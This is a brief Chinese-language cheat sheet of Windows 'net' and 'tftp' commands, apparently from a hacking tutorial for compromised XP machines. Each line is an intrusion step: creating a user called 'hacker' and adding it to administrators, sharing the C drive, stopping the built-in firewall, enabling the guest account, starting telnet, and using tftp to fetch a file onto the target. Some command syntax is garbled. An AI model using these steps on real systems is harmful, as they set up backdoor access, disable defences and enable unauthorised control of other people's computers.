net share 查看共享
net share c$=c:\ 将C盘设成共享
net user 显示所有用户
net user hacker 123/add 建立一个用户
net localgroup administrators 123/add 将123提升为管理员
net stop sharedaccess 停止XP自带防火墙
net user guest /active:yes 激活GUEST用户
net start telnet 开启TELNET服务
tftp -i 目标IP get 文件名 存放地址(目标主机) TFTP上传命令